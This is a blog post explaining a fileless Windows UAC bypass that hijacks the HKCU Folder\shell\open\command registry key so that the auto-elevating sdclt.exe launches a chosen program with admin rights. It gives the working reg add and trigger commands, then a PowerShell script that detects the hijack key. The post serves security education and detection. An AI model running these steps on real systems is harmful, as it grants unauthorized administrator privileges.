Noë Flatreaud

UAC Bypass via Sdclt.exe

A couple of days ago, I stumbled upon a clever UAC bypass technique that abuses sdclt.exe, a built-in Windows binary used for backup and restore operations. This method is fileless, relies on COM hijacking, and was originally documented by Matt Nelson (links in the references at the end of this post).

How it works

Windows maintains a list of auto-elevating executables: binaries that run at high integrity (admin rights) without triggering a UAC prompt. sdclt.exe is one of them.

You can verify this yourself with Sysinternals Sigcheck:

$ sigcheck.exe -m C:\Windows\System32\sdclt.exe | findstr autoElevate

If the output contains <autoElevate>true</autoElevate>, congratulations: you have found a potential UAC bypass candidate.

The COM Hijacking trick

When sdclt.exe is launched from a medium-integrity process (a normal user session), it:

  1. Spawns itself at high integrity (thanks, auto-elevation!).
  2. Calls control.exe (which therefore also runs at high integrity).
  3. Fails to find a default "open" command for the Folder object in the current user's per-user class registrations (HKCU\Software\Classes).

This is where the magic happens:

Since medium-integrity users can write to HKCU, we can hijack the missing command and make control.exe run whatever we want — with admin rights.

Exploit

1. Set Up the Malicious Registry Key

We’ll modify the Folder\shell\open\command key to execute our payload (in this case, notepad.exe for demo purposes):

$ reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f
$ reg add "HKCU\Software\Classes\Folder\shell\open\command" /v "DelegateExecute" /f

2. Trigger the Bypass

Now, just run:

$ %windir%\system32\sdclt.exe

Et voilà! Notepad pops up, running at high integrity (admin rights).

3. Clean Up

Don't be a jerk: always revert your changes after testing:

$ reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f
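From the defensive side, that same key is the thing to watch for: legitimate software rarely creates Folder\shell\open\command in a user hive. The following PowerShell check is an added example, not code from the original post; it audits every loaded per-user class hive for the key and reports the command and whether the DelegateExecute value is present. It assumes it is run elevated so that other users' hives are readable (unelevated, it only sees the current user's own hive).

```powershell
# Added defensive check (not from the original post): audits the registry key the
# sdclt.exe bypass relies on, Folder\shell\open\command, in every loaded user hive.
# Assumes an elevated session so that all HKEY_USERS\<SID>_Classes hives are readable.

function Test-FolderOpenHijack {
    param([Parameter(Mandatory)][string]$ClassesRoot)   # e.g. Registry::HKEY_USERS\<SID>_Classes

    $key = "$ClassesRoot\Folder\shell\open\command"
    # An absent key is the expected, clean state.
    if (-not (Test-Path -LiteralPath $key -ErrorAction SilentlyContinue)) { return $null }

    $props = Get-ItemProperty -LiteralPath $key -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Key             = $key
        Command         = $props.'(default)'                                   # payload run by control.exe
        DelegateExecute = $props.PSObject.Properties.Name -contains 'DelegateExecute'
    }
}

# HKCU\Software\Classes is backed by the user's HKEY_USERS\<SID>_Classes hive (UsrClass.dat),
# so enumerating those hives covers every currently logged-on user, not just the caller.
$roots = Get-ChildItem 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object Name -like '*_Classes' |
    ForEach-Object { "Registry::$($_.Name)" }

$findings = $roots | ForEach-Object { Test-FolderOpenHijack -ClassesRoot $_ } | Where-Object { $_ }

if ($findings) {
    Write-Warning 'Folder\shell\open\command found in a user hive; review the command below:'
    $findings | Format-Table -AutoSize
} else {
    Write-Host 'No Folder\shell\open\command key found in any loaded user hive.'
}
```

Because the key is normally deleted right after use (as in the cleanup step above), a point-in-time audit should be paired with registry-write auditing on this path, for example Sysmon Event ID 12 (key create/delete) and 13 (value set).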

References

https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths
https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/
https://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass